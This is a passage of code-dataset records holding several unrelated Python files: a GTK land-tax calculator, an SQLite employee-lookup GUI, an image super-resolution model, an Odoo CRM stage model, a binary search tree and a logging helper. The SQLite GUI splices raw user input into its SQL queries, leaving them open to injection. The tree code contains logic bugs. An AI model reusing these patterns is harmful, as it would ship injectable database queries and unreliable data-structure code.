clear(self):\n\t\tself.file_path = None\n\t\tself.report_path = None\n\n\t\tself.file_saved = True\n\n\t\tself.report.get_buffer().set_text('')\n\t\tself.wordpad.get_buffer().set_text('')\n\t\tself.liststore.clear()\n\n\tdef apply_handlers(self):\n\t\tself.liststore.connect('row-changed', self.liststore_row_changed)\n\t\tself.wordpad.get_buffer().connect('changed', self.wordpad_buffer_changed)\n\n\n\n\tdef built_errors_dict(self):\n\t\tself.errors = {\n\t\t\t'IDVal'\t\t:\t'Incorrect \"ID\" value.\\n',\n\t\t\t'TypeVal'\t:\t'Incorrect \"Type\" value.\\n',\n\t\t\t'WidthVal'\t:\t'Incorrect \"Width\" value.\\n',\n\t\t\t'HeightsVal':\t'Incorrect \"Heights\" value.\\n'\n\t\t\t}\n\n\tdef error_show(self, msg):\n\t\terror_buffer = self.error.get_buffer()\n\t\teb_start = error_buffer.get_start_iter()\n\t\teb_end = error_buffer.get_end_iter()\n\t\ttext = error_buffer.get_text(eb_start, eb_end, True) + msg\n\n\t\tself.error.get_buffer().set_text(text)\n\t\tself.error_box.show_all()\n\n\tdef error_hide(self):\n\t\tself.error.get_buffer().set_text('')\n\t\tself.error_box.hide()\n\n\tdef str_to_int(self, str):\n\t\ttry:\n\t\t\tx = int(str)\n\n\t\t\tif not (-2147483648 <= x <= 2147483647):\n\t\t\t\tx = None\n\t\texcept ValueError:\n\t\t\tx = None\n\n\t\treturn x\n\n\n\n\tdef read_from_file(self, path):\n\t\tifile = open(path, 'r')\n\t\ttext = ifile.read()\n\t\tifile.close()\n\n\t\treturn text\n\n\tdef write_to_file(self, path, text):\n\t\tofile = open(path, 'w')\n\t\tofile.write(text)\n\t\tofile.close()\n\n\n\n\tdef refresh(self):\n\t\tself.refresh_wordpad()\n\t\tself.refresh_report()\n\n\tdef refresh_wordpad(self):\n\t\tif not ( self.wordpad.get_visible() ):\n\t\t\treturn\n\n\t\ttext = self.liststore_to_text()\n\t\tself.wordpad.get_buffer().set_text(text)\n\n\tdef refresh_report(self):\n\t\tif not ( self.report.get_visible() ):\n\t\t\treturn\n\n\t\ttext = self.report_gen()\n\t\tself.report.get_buffer().set_text(text)\n\n\tdef reparse_ssheet(self):\n\t\twordpad_buffer = self.wordpad.get_buffer()\n\t\twordpad_buffer_start = wordpad_buffer.get_start_iter()\n\t\twordpad_buffer_end = wordpad_buffer.get_end_iter()\n\n\t\ttext = wordpad_buffer.get_text(wordpad_buffer_start, wordpad_buffer_end, True)\n\n\t\tself.text_to_liststore(text)\n\n\t\tself.refresh_report()\n\n\n\n\tdef get_open_file_path(self):\n\t\tbuttons = (\n\t\t\tGtk.STOCK_CANCEL,\n\t\t\tGtk.ResponseType.CANCEL,\n\t\t\tGtk.STOCK_OPEN,\n\t\t\tGtk.ResponseType.OK\n\t\t\t)\n\n\t\tdialog = Gtk.FileChooserDialog('Open file...', self, Gtk.FileChooserAction.OPEN, buttons)\n\t\tdialog.set_select_multiple(False)\n\n\t\tfilters = [\n\t\t\tGtk.FileFilter(),\n\t\t\tGtk.FileFilter()\n\t\t\t]\n\t\tfilters[0].set_name('Text Files')\n\t\tfilters[0].add_mime_type('text/plain')\n\t\tfilters[1].set_name('Any Files')\n\t\tfilters[1].add_mime_type('*')\n\t\tfor i in filters:\n\t\t\tdialog.add_filter(i)\n\n\t\tresult = None\n\n\t\tresponce = dialog.run()\n\t\tif (responce == Gtk.ResponseType.OK):\n\t\t\tresult = dialog.get_filename()\n\n\t\tdialog.destroy()\n\n\t\treturn result\n\n\tdef get_save_file_path(self):\n\t\tbuttons = (\n\t\t\tGtk.STOCK_CANCEL,\n\t\t\tGtk.ResponseType.CANCEL,\n\t\t\tGtk.STOCK_SAVE,\n\t\t\tGtk.ResponseType.OK\n\t\t\t)\n\n\t\tdialog = Gtk.FileChooserDialog('Save file as...', self, Gtk.FileChooserAction.SAVE, buttons)\n\n\t\tfilters = [\n\t\t\tGtk.FileFilter(),\n\t\t\tGtk.FileFilter()\n\t\t\t]\n\t\tfilters[0].set_name('Text Files')\n\t\tfilters[0].add_mime_type('text/plain')\n\t\tfilters[1].set_name('Any 
Files')\n\t\tfilters[1].add_mime_type('*')\n\t\tfor i in filters:\n\t\t\tdialog.add_filter(i)\n\n\t\tresult = None\n\n\t\tresponce = dialog.run()\n\t\tif (responce == Gtk.ResponseType.OK):\n\t\t\tresult = dialog.get_filename()\n\n\t\tdialog.destroy()\n\n\t\treturn result\n\n\tdef unsaved_dialog(self):\n\t\tdialog = Gtk.Dialog(title = 'Unsaved changes!', parent = self)\n\n\t\tdialog.set_default_size(150, 100)\n\t\tdialog.set_resizable(False)\n\n\t\tlabel = Gtk.Label('Save changes to file before closing?')\n\t\tdialog.get_content_area().add(label)\n\n\t\tdialog.add_button(Gtk.STOCK_OK, Gtk.ResponseType.YES)\n\t\tdialog.add_button(Gtk.STOCK_NO, Gtk.ResponseType.NO)\n\t\tdialog.add_button(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL)\n\n\t\tdialog.set_modal(True)\n\n\t\tdialog.show_all()\n\n\t\tresponse = dialog.run()\n\t\tdialog.destroy()\n\n\t\tif response == Gtk.ResponseType.YES:\n\t\t\treturn True\n\t\telif response == Gtk.ResponseType.NO:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn None\n\n\tdef about_dialog(self):\n\t\tdialog = Gtk.Dialog(title = 'About', parent = self)\n\n\t\tdialog.set_default_size(250, 200)\n\t\tdialog.set_resizable(False)\n\n\t\tdialog_box = Gtk.Box()\n\t\tdialog_box.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tdialog.get_content_area().add(dialog_box)\n\n\t\tname = Gtk.Label('Land-tax Calculator')\n\t\tversion = Gtk.Label('Version: 1.0.0')\n\t\tauthor = Gtk.Label('Author:\\tRoman Titov')\n\n\t\tlogo = Gtk.Image()\n\t\tlogo.set_from_file('./res/about_logo.jpg')\n\n\t\tdialog_box.pack_start(name, False, False, 0)\n\t\tdialog_box.pack_start(version, False, False, 0)\n\t\tdialog_box.pack_start(logo, False, False, 0)\n\t\tdialog_box.pack_start(author, False, False, 0)\n\n\t\tdialog_box.show_all()\n\t\tdialog.run()\n\t\tdialog.destroy()\n\n\n\n\t# PARSERS:\n\tdef text_to_liststore(self, text):\n\t\tself.liststore.clear()\n\n\t\tregexp = '^.*[^ \\t\\n]+.*$'\n\t\tlines = re.findall(regexp, text, flags = re.M)\n\n\t\tsep = '[ \\t]+'\n\t\tnum = '([1-9][0-9]*)'\n\t\tregexp = '[ \\t]*' + num + sep + '([1-5])' + sep + num + sep + num + '[ \\t]*'\n\n\t\tfor i in range( len(lines) ):\n\t\t\terror_msg = 'Invalid source data, str ' + str(i) + '\\n'\t\t\t\n\n\t\t\tgroups = re.match(regexp, lines[i])\n\t\t\t\n\t\t\tif groups == None:\n\t\t\t\tself.error_show(error_msg)\n\t\t\t\tcontinue\n\n\t\t\tentries = []\n\t\t\tfor j in range(1, 5):\n\t\t\t\tentrie = groups.group(j)\n\t\t\t\tentrie = self.str_to_int(entrie)\n\n\t\t\t\tentries.append(entrie)\n\n\t\t\tif None in entries:\n\t\t\t\tself.error_show(error_msg)\n\t\t\t\tcontinue\t\t\t\t\n\n\t\t\tself.liststore.append(entries)\n\n\tdef liststore_to_text(self):\n\t\ttext = ''\n\n\t\tformat_str = '{0[0]:<15} {0[1]:<8} {0[2]:<10} {0[3]:<10}\\n'\n\t\tfor entries in self.liststore:\n\t\t\ttext += format_str.format(entries)\n\n\t\treturn text\n\n\tdef report_gen(self):\n\t\tif len(self.liststore) == 0:\n\t\t\treturn ''\n\n\t\ttaxes = [2.50, 2.98, 3.67, 4.61, 5.70]\n\n\t\ttext = ''\n\t\ttext += 'Отчёт: \\n\\n'\n\t\ttext += 'Участки: \\n'\n\n\t\tformat_str = '{0[0]:<30} {0[1]:<15} {0[2]:<15} {0[3]:<15}\\n'\n\n\t\theaders = ['Номер:', 'Площадь (М2):', 'Площадь (Га):', 'Налог:']\n\t\ttext += format_str.format(headers)\n\n\t\ttypes_nfo = []\n\t\tfor i in range(5):\n\t\t\ttypes_nfo.append([0, 0, 0, 0])\n\n\t\ttotal_square = 1\n\n\t\tfor entries in self.liststore:\n\t\t\tm2_square = entries[2] * entries[3]\n\t\t\tga_square = m2_square / 10000\n\t\t\tsumm = m2_square * taxes[entries[1] - 1]\n\n\t\t\ten_type_nfo = types_nfo[entries[1] - 
1]\n\t\t\ten_type_nfo[0] += 1\n\t\t\ten_type_nfo[1] += m2_square\n\t\t\ten_type_nfo[2] += ga_square\n\t\t\ten_type_nfo[3] += summ\n\n\t\t\ttotal_square += m2_square\n\n\t\t\ttext += format_str.format([\n\t\t\t\tentries[0],\n\t\t\t\tm2_square,\n\t\t\t\tga_square,\n\t\t\t\tsumm\n\t\t\t\t])\n\n\t\ttext += '\\n'\n\n\t\tformat_str = '{0:<30} {1:<15}\\n'\n\n\t\tfor i in range( len(types_nfo) ):\n\t\t\ttype_nfo = types_nfo[i]\n\n\t\t\tif (type_nfo[0] == 0):\n\t\t\t\tcontinue\n\n\t\t\ttext += 'Тип #' + str(i) + '\\n'\n\t\t\ttext += format_str.format('Количество участков:', type_nfo[0])\n\t\t\ttext += format_str.format('Площадь участков (М2):', type_nfo[1])\n\t\t\ttext += format_str.format('Площадь участков (Га):', type_nfo[2])\n\t\t\ttext += format_str.format('Общая сумма налога:', type_nfo[3])\n\n\t\t\tpercent = (type_nfo[1] / total_square) * 100\n\t\t\ttext += format_str.format('Процент от общей площади:', percent)\n\t\t\t\n\t\t\ttext += '\\n'\n\n\t\treturn text\n\n\n\nwindow = ReWindow()\nwindow.connect(\"delete-event\", Gtk.main_quit)\n\nwindow.ssheet_box.show_all()\nwindow.edit_notebook.set_current_page(1)\n\nwindow.show_all()\nwindow.report_scroller.hide()\nwindow.error_box.hide()\n\nGtk.main()\n","sub_path":"Algorithms/Big Practice Task (Python)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"228333","text":"messages = {\n 'not_admin': 'Sorry, you must be a FreshBooks admin user to use this application',\n 'missing_url': 'Missing required field: url',\n 'missing_verifier': 'Missing required field: verifier',\n 'missing_field': 'Required field missing',\n 'unknown_system': 'Unknown System: %(system)s',\n}\n\ndef get_message(key, **kwargs):\n global messages\n if key not in messages:\n return 'Unknown Message'\n return messages[key] % kwargs\n","sub_path":"freshbooks/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135738587","text":"import numbers\nimport os.path as osp\n\nimport mmcv\nimport torch\n\nfrom mmedit.core import tensor2img\nfrom ..builder import build_backbone, build_component, build_loss\nfrom ..registry import MODELS\nfrom .basic_restorer import BasicRestorer\n\n\n@MODELS.register_module()\nclass TTSR(BasicRestorer):\n \"\"\"TTSR model for Reference-based Image Super-Resolution.\n\n Paper: Learning Texture Transformer Network for Image Super-Resolution.\n\n Args:\n generator (dict): Config for the generator.\n extractor (dict): Config for the extractor.\n transformer (dict): Config for the transformer.\n pixel_loss (dict): Config for the pixel loss.\n train_cfg (dict): Config for train. Default: None.\n test_cfg (dict): Config for testing. Default: None.\n pretrained (str): Path for pretrained model. 
Default: None.\n \"\"\"\n\n def __init__(self,\n generator,\n extractor,\n transformer,\n pixel_loss,\n train_cfg=None,\n test_cfg=None,\n pretrained=None):\n super(BasicRestorer, self).__init__()\n\n self.train_cfg = train_cfg\n self.test_cfg = test_cfg\n\n # model\n self.generator = build_backbone(generator)\n self.transformer = build_component(transformer)\n self.extractor = build_component(extractor)\n\n # loss\n self.pixel_loss = build_loss(pixel_loss)\n\n # pretrained\n self.init_weights(pretrained)\n\n def forward_dummy(self, lq, lq_up, ref, ref_downup, only_pred=True):\n \"\"\"Forward of networks.\n\n Args:\n lq (Tensor): LQ image.\n lq_up (Tensor): Upsampled LQ image.\n ref (Tensor): Reference image.\n ref_downup (Tensor): Image generated by sequentially applying\n bicubic down-sampling and up-sampling on reference image.\n only_pred (bool): Only return predicted results or not.\n Default: True.\n\n Returns:\n pred (Tensor): Predicted super-resolution results (n, 3, 4h, 4w).\n s (Tensor): Soft-Attention tensor with shape (n, 1, h, w).\n t_level3 (Tensor): Transformed HR texture T in level3.\n (n, 4c, h, w)\n t_level2 (Tensor): Transformed HR texture T in level2.\n (n, 2c, 2h, 2w)\n t_level1 (Tensor): Transformed HR texture T in level1.\n (n, c, 4h, 4w)\n \"\"\"\n\n _, _, lq_up_level3 = self.extractor(lq_up)\n _, _, ref_downup_level3 = self.extractor(ref_downup)\n ref_level1, ref_level2, ref_level3 = self.extractor(ref)\n\n s, t_level3, t_level2, t_level1 = self.transformer(\n lq_up_level3, ref_downup_level3, ref_level1, ref_level2,\n ref_level3)\n\n pred = self.generator(lq, s, t_level3, t_level2, t_level1)\n\n if only_pred:\n return pred\n return pred, s, t_level3, t_level2, t_level1\n\n def forward(self, lq, gt=None, test_mode=False, **kwargs):\n \"\"\"Forward function.\n\n Args:\n lq (Tensor): Input lq images.\n gt (Tensor): Ground-truth image. Default: None.\n test_mode (bool): Whether in test mode or not. 
Default: False.\n kwargs (dict): Other arguments.\n \"\"\"\n\n if test_mode:\n return self.forward_test(lq, gt=gt, **kwargs)\n\n return self.forward_dummy(lq, **kwargs)\n\n def train_step(self, data_batch, optimizer):\n \"\"\"Train step.\n\n Args:\n data_batch (dict): A batch of data, which requires\n 'lq', 'gt', 'lq_up', 'ref', 'ref_downup'\n optimizer (obj): Optimizer.\n\n Returns:\n dict: Returned output, which includes:\n log_vars, num_samples, results (lq, gt and pred).\n\n \"\"\"\n # data\n lq = data_batch['lq']\n lq_up = data_batch['lq_up']\n gt = data_batch['gt']\n ref = data_batch['ref']\n ref_downup = data_batch['ref_downup']\n\n # generate\n pred = self.forward_dummy(lq, lq_up, ref, ref_downup)\n\n # loss\n losses = dict()\n\n losses['loss_pix'] = self.pixel_loss(pred, gt)\n\n # parse loss\n loss, log_vars = self.parse_losses(losses)\n\n # optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n log_vars.pop('loss') # remove the unnecessary 'loss'\n outputs = dict(\n log_vars=log_vars,\n num_samples=len(gt.data),\n results=dict(\n lq=lq.cpu(), gt=gt.cpu(), ref=ref.cpu(), output=pred.cpu()))\n\n return outputs\n\n def forward_test(self,\n lq,\n lq_up,\n ref,\n ref_downup,\n gt=None,\n meta=None,\n save_image=False,\n save_path=None,\n iteration=None):\n \"\"\"Testing forward function.\n\n Args:\n lq (Tensor): LQ image\n gt (Tensor): GT image\n lq_up (Tensor): Upsampled LQ image\n ref (Tensor): Reference image\n ref_downup (Tensor): Image generated by sequentially applying\n bicubic down-sampling and up-sampling on reference image\n meta (list[dict]): Meta data, such as path of GT file.\n Default: None.\n save_image (bool): Whether to save image. Default: False.\n save_path (str): Path to save image. Default: None.\n iteration (int): Iteration for the saving image name.\n Default: None.\n\n Returns:\n dict: Output results, which contain either key(s)\n 1. 'eval_result'.\n 2. 'lq', 'pred'.\n 3. 'lq', 'pred', 'gt'.\n \"\"\"\n\n # generator\n with torch.no_grad():\n pred = self.forward_dummy(\n lq=lq, lq_up=lq_up, ref=ref, ref_downup=ref_downup)\n\n pred = (pred + 1.) / 2.\n if gt is not None:\n gt = (gt + 1.) / 2.\n\n if self.test_cfg is not None and self.test_cfg.get('metrics', None):\n assert gt is not None, (\n 'evaluation with metrics must have gt images.')\n results = dict(eval_result=self.evaluate(pred, gt))\n else:\n results = dict(lq=lq.cpu(), output=pred.cpu())\n if gt is not None:\n results['gt'] = gt.cpu()\n\n # save image\n if save_image:\n if 'gt_path' in meta[0]:\n the_path = meta[0]['gt_path']\n else:\n the_path = meta[0]['lq_path']\n folder_name = osp.splitext(osp.basename(the_path))[0]\n if isinstance(iteration, numbers.Number):\n save_path = osp.join(save_path, folder_name,\n f'{folder_name}-{iteration + 1:06d}.png')\n elif iteration is None:\n save_path = osp.join(save_path, f'{folder_name}.png')\n else:\n raise ValueError('iteration should be number or None, '\n f'but got {type(iteration)}')\n mmcv.imwrite(tensor2img(pred), save_path)\n\n return results\n\n def init_weights(self, pretrained=None, strict=True):\n \"\"\"Init weights for models.\n\n Args:\n pretrained (str, optional): Path for pretrained weights. If given\n None, pretrained weights will not be loaded. 
Defaults to None.\n            strict (bool, optional): Whether to strictly load the pretrained model.\n                Defaults to True.\n        \"\"\"\n        if isinstance(pretrained, str):\n            if self.generator:\n                self.generator.init_weights(pretrained, strict)\n            if self.extractor:\n                self.extractor.init_weights(pretrained, strict)\n            if self.transformer:\n                self.transformer.init_weights(pretrained, strict)\n        elif pretrained is not None:\n            raise TypeError('\"pretrained\" must be a str or None. '\n                            f'But received {type(pretrained)}.')\n","sub_path":"mmedit/models/restorers/ttsr.py","file_name":"ttsr.py","file_ext":"py","file_size_in_byte":8179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"293652750","text":"from tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom tkinter.filedialog import askopenfile \r\nimport time\r\nimport os\r\nimport sqlite3\r\nfrom io import BytesIO\r\n\r\ndef writeTofile(data, filename):\r\n    # Convert binary data to proper format and write it on Hard Disk\r\n    with open(filename, 'wb') as file:\r\n        file.write(data)\r\n\r\ndef readBlobData():\r\n    try:\r\n        sqliteConnection = sqlite3.connect('__IAMRI__.db')\r\n        cursor = sqliteConnection.cursor()\r\n\r\n        cursor.execute(\"\"\"SELECT * from new_employee where Id =\"\"\"+dwonload_name_search.get())\r\n        #cursor.execute(sql_fetch_blob_query, (dwonload_name_search.get(),))\r\n        record = cursor.fetchall()\r\n        for row in record:\r\n            print(\"Id = \", row[0], \"Name = \", row[1])\r\n            name = row[1]\r\n            photo = row[2]\r\n            resumeFile = row[3]\r\n\r\n            print(\"Storing employee image and resume on disk \\n\")\r\n            photoPath =name + \"001.jpeg\"\r\n            resumePath =name + \"002.pdf\"\r\n            writeTofile(photo, photoPath)\r\n            writeTofile(resumeFile, resumePath)\r\n\r\n        cursor.close()\r\n\r\n    except sqlite3.Error as error:\r\n        print(\"Failed to read blob data from sqlite table\", error)\r\n    finally:\r\n        if sqliteConnection:\r\n            sqliteConnection.close()\r\n            print(\"sqlite connection is closed\")\r\n\r\n#readBlobData('smith')\r\n#readBlobData(2)\r\n# fetch all data matching the query\r\ndef revert():\r\n    sqliteConnection = sqlite3.connect('__IAMRI__.db')\r\n    cursor = sqliteConnection.cursor()\r\n    print(\"Connected to SQLite\")\r\n\r\n    cursor.execute(\"\"\"SELECT * from new_employee where name like '%\"\"\"+name_search.get()+\"\"\"%'\"\"\")\r\n    #cursor.execute(sql_fetch_blob_query, (name_search.get(),))\r\n    list0=cursor.fetchall()\r\n    cursor.close()\r\n    sqliteConnection.close()\r\n    output=''\r\n    for x in list0:\r\n        if type(x[0])==int:\r\n            one=str(x[0])\r\n        if type(x[2])==bytes:\r\n            two=str(x[2])\r\n        if type(x[3])==bytes:\r\n            three=str(x[3])\r\n        output=output+one+' '+x[1]+'\\n'\r\n    status.set('Data fetched successfully ☻☻☻')\r\n    return output\r\n\r\n#creating a GUI window\r\nmaster=Tk()\r\nmaster.title(\"Employee Database created by Tarun kumar\")\r\nmaster.geometry(\"500x500\")\r\n\r\nname_search=StringVar()\r\nstatus=StringVar()\r\ndwonload_name_search=StringVar()\r\n#creating a label\r\nl1=Label(master,text=\"Employee Database\",font=(\"Arial Bold\",25))\r\nl1.grid(row=0,column=0,columnspan=2,sticky=W)\r\n\r\nl2=Label(master,text=\"Enter the name to search:\",font=(\"Arial Bold\",15))\r\nl2.grid(row=1,column=0)\r\n\r\n\r\n#creating a text box for better handling for the user\r\ntext=Text(master,width=50,height=10)\r\ntext.grid(row=7,columnspan=6) 
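\r\n# search results returned by revert() are inserted into this Text box by the Search button below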
\r\n\r\nEntry(master,textvariable=name_search).grid(row=1,column=1)\r\nButton(master,text=\"Search\",command=lambda:text.insert(END,revert())).grid(row=3,columnspan=2)\r\nl3=Label(master,text=\"Looking for Dwonload\",font=(\"Arial Bold\",15))\r\nl3.grid(row=5,column=0)\r\nl4=Label(master,text=\"Search Result Are Shown on dwon :\",font=(\"Arial Bold\",10))\r\nl4.grid(row=4,column=0)\r\nButton(master,text=\"Dwonload\",command=lambda:readBlobData()).grid(row=6,columnspan=2)\r\nEntry(master,textvariable=dwonload_name_search).grid(row=5,column=1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmaster.mainloop()\r\n\r\n\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"82694918","text":"# -*- coding: utf-8 -*-\n\nfrom math import floor, ceil\n\nfrom odoo import models, fields, api\n\nHOURS_IN_A_DAY = 24\n\nclass CrmStage(models.Model):\n ######################\n # Private attributes #\n ######################\n _inherit = \"crm.stage\"\n \n ###################\n # Default methods #\n ###################\n def name_get(self):\n result = []\n for stage in self:\n name = stage.name + \" (\" + str(stage.average_duration_text) + \")\"\n result.append((stage.id, name))\n return result\n\n ######################\n # Fields declaration #\n ######################\n target_duration = fields.Float(string=\"Target Duration (Days)\")\n target_duration_text = fields.Char(string=\"Target Duration\",\n compute=\"_compute_target_duration_text\")\n average_duration = fields.Float(string=\"Average Duration (Days)\",\n compute=\"_compute_average_duration\")\n average_duration_text = fields.Char(string=\"Average Duration\",\n compute=\"_compute_average_duration\")\n is_last_stage = fields.Boolean(string=\"Is Last Stage\",\n compute=\"_compute_is_last_stage\")\n current_within = fields.Integer(string=\"Current Within Target\",\n compute=\"_compute_stats\")\n current_beyond = fields.Integer(string=\"Current Beyond Target\",\n compute=\"_compute_stats\")\n total_within = fields.Integer(string=\"Total Within Target\",\n compute=\"_compute_stats\")\n total_beyond = fields.Integer(string=\"Total Beyond Target\",\n compute=\"_compute_stats\")\n lead_ids = fields.One2many(string=\"Leads\",\n comodel_name=\"crm.lead\",\n inverse_name=\"stage_id\")\n log_ids = fields.One2many(string=\"Logs\",\n comodel_name=\"crm.lead.stage.log\",\n inverse_name=\"stage_id\")\n ##############################\n # Compute and search methods #\n ##############################\n @api.multi\n @api.depends(\"target_duration\")\n def _compute_target_duration_text(self):\n for stage in self:\n stage.target_duration_text = self.duration_to_text(stage.target_duration)\n \n @api.multi\n def _compute_average_duration(self):\n for stage in self:\n log_obj = self.env[\"crm.lead.stage.log\"]\n leads = self.env[\"crm.lead\"].search([('stage_id', '=', stage.id)])\n result = 0.0\n if leads:\n total = sum(l.duration_in_stage for l in leads)\n result = total / len(leads)\n stage.average_duration = result\n stage.average_duration_text = self.duration_to_text(result)\n\n @api.depends(\"team_id\")\n def _compute_is_last_stage(self):\n for stage in self:\n result = False\n stage_ids = stage.sudo().search([(\"team_id\",\"=\",stage.team_id.id)]).ids\n current_stage_index = stage_ids.index(stage.id)\n if current_stage_index == (len(stage_ids) - 1):\n result = True\n stage.is_last_stage = result\n \n @api.multi\n def _compute_stats(self):\n for 
stage in self:\n current_within = 0\n current_beyond = 0\n for lead in stage.lead_ids:\n if lead.duration_status == 'within':\n current_within += 1\n else:\n current_beyond += 1\n \n stage.current_within = current_within\n stage.current_beyond = current_beyond\n within = set()\n beyond = set()\n for log in stage.log_ids:\n if log.status == 'Within':\n within.add(log.lead_id.id)\n else:\n beyond.add(log.lead_id.id)\n \n new_set = within - beyond\n \n stage.total_within = len(new_set)\n stage.total_beyond = len(beyond)\n \n ############################\n # Constrains and onchanges #\n ############################\n\n #########################\n # CRUD method overrides #\n #########################\n\n ##################\n # Action methods #\n ##################\n\n ####################\n # Business methods #\n ####################\n def duration_to_text(self, duration):\n days = int(floor(duration))\n hours = int(ceil((duration % 1) * HOURS_IN_A_DAY))\n text = \"\"\n if days:\n text = \"{}D\".format(days)\n text += \"{}H\".format(hours)\n return text","sub_path":"lead_stage_duration/models/crm_stage.py","file_name":"crm_stage.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"375493670","text":"from collections import Sequence\nfrom enum import Enum\n\n\nclass BSTree(Sequence):\n def __init__(self):\n self.root = None\n self.count = 0\n self.traversal_mode = TraversalMode.LNR\n\n def __len__(self) -> int:\n return self.count\n\n def __getitem__(self, value):\n if isinstance(value, slice):\n raise IndexError('slice is not supported.')\n node = self.root\n while node is not None:\n if value < node.value:\n node = node.left\n continue\n if value > node.value:\n node = node.right\n continue\n break\n return node\n\n def __delitem__(self, value):\n self.remove_node(self.__getitem__(value))\n\n def __contains__(self, value) -> bool:\n return self.__getitem__(value) is not None\n\n def __iter__(self):\n if self.traversal_mode == TraversalMode.LNR:\n return LNRIterator(self.root)\n\n def __str__(self) -> str:\n return (str)(n.value for n in self.__iter__())\n\n def add(self, value):\n return self.add_node(BSTreeNode(value))\n\n def add_node(self, node):\n if self.root is None:\n self.root = node\n self.count += 1\n self.root.origin = self\n return node\n\n if node.parent is None:\n node.parent = self.root\n\n if node.value < node.parent.value:\n if node.parent.left is None:\n node.parent.left = node\n self.count += 1\n node.origin = self\n return node\n node.parent = node.parent.left\n return self.add_node(node)\n\n if node.value > node.parent.value:\n if node.parent.right is None:\n node.parent.right = node\n self.count += 1\n node.origin = self\n return node\n node.parent = node.parent.right\n return self.add_node(node)\n return None\n\n def remove_node(self, node):\n if node is None or node.origin != self:\n return None\n\n was_head = node == self.root\n\n if self.count == 1:\n self.root = None\n node.origin = None\n self.count -= 1\n return node\n\n if node.is_leaf():\n if node.is_left_child:\n node.parent.left = None\n else:\n node.parent.right = None\n\n node.origin = None\n node.parent = None\n return node\n\n if node.child_amout() == 1:\n if node.has_left_child:\n if was_head:\n self.root = node.left\n if node.is_left_child:\n node.parent.left = node.left\n else:\n node.parent.right = node.left\n return node\n if was_head:\n self.root = node.right\n if node.is_left_child:\n node.parent.left = 
node.right\n else:\n node.parent.right = node.right\n return node\n\n # two children: replace the value with the in-order predecessor,\n # the rightmost node of the left subtree\n successor_node = node.left\n while successor_node.right is not None:\n successor_node = successor_node.right\n node.value = successor_node.value\n self.remove_node(successor_node)\n return node\n\n\nclass BSTreeNode:\n def __init__(self, value):\n self.value = value\n self.right = None\n self.left = None\n self.parent = None\n self.origin = None\n\n def has_right_child(self):\n return self.right is not None\n\n def has_left_child(self):\n return self.left is not None\n\n def child_amout(self):\n a = 0\n if self.right is not None:\n a += 1\n if self.left is not None:\n a += 1\n return a\n\n def is_right_child(self):\n return self.parent is not None and self.parent.right == self\n\n def is_left_child(self):\n return self.parent is not None and self.parent.left == self\n\n def is_leaf(self):\n return self.left is None and self.right is None\n\n\nclass LNRIterator:\n def __init__(self, node):\n self.current = node\n\n def __iter__(self):\n while self.current is not None:\n\n if self.current.left is None:\n yield self.current.value\n self.current = self.current.right\n else:\n pre = self.current.left\n while pre.right is not None and pre.right is not self.current:\n pre = pre.right\n\n if pre.right is None:\n pre.right = self.current\n self.current = self.current.left\n\n else:\n pre.right = None\n yield self.current.value\n self.current = self.current.right\n\n\nclass TraversalMode(Enum):\n LNR = 1\n NLR = 2\n RNL = 3\n","sub_path":"src/data-structures/tree/binary-search-tree/bstree.py","file_name":"bstree.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"369594704","text":"\"\"\"\r\nProvides a simple facade over the standard Python logging module\r\n\"\"\"\r\nimport sys, traceback\r\nimport os\r\nimport time\r\nimport datetime\r\nimport logging\r\nimport logging.handlers\r\ntry:\r\n from StringIO import StringIO\r\nexcept ImportError:\r\n # Python 3.x\r\n from io import StringIO\r\n\r\nLOG_FILENAME = 'logs/debug.txt'\r\nmy_logger = None\r\n_CURR_FUNC = None\r\n\r\ndef DEBUG(msg,logger=None):\r\n global _CURR_FUNC\r\n cf = _currentFunction(1)\r\n if cf != _CURR_FUNC:\r\n _CURR_FUNC = cf\r\n my_logger.debug(\"In Function: {0}----------------\".format(cf))\r\n my_logger2.debug(msg)\r\n\r\ndef INFO(msg,logger=None):\r\n my_logger.info(msg)\r\n\r\ndef WARN(msg,logger=None):\r\n my_logger.warning(msg)\r\n\r\ndef ERROR(msg,logger=None):\r\n my_logger.error(msg)\r\n\r\n\r\ndef LOGFILE():\r\n return os.path.abspath(LOG_FILENAME)\r\n\r\ndef _getLastFunc(framePos = 0, numFrames = 1):\r\n \"\"\"Get the last function prior to the logging calls\"\"\"\r\n assert numFrames > 0, \"Invalid numFrames = {0}\".format(numFrames)\r\n stackList = traceback.extract_stack()\r\n l = len(stackList)\r\n stIndex = l-3-framePos\r\n if stIndex < 0:\r\n assert False, \"Stackframe {0} not available\".format(framePos)\r\n else:\r\n i = stIndex\r\n while i > -1:\r\n stFrame = stackList[i]\r\n i = i - 1\r\n yield stFrame\r\n numFrames = numFrames - 1\r\n if numFrames == 0:\r\n break\r\n return\r\n\r\ndef _currentFunction(framePos = 0):\r\n return list(_getLastFunc(framePos))[0][2]\r\n\r\ndef STACKTRACE(framePos = 0, numFrames = 1):\r\n output = StringIO()\r\n output.write(\"Stack Dump (most recent first):\\n\")\r\n i = framePos\r\n for fr in _getLastFunc(framePos, numFrames):\r\n output.write(\"\\t[{0}] - {1}\\n\".format(i,fr))\r\n i += 1\r\n 
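# hand the assembled stack dump to the DEBUG facade, then release the buffer\r\n 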
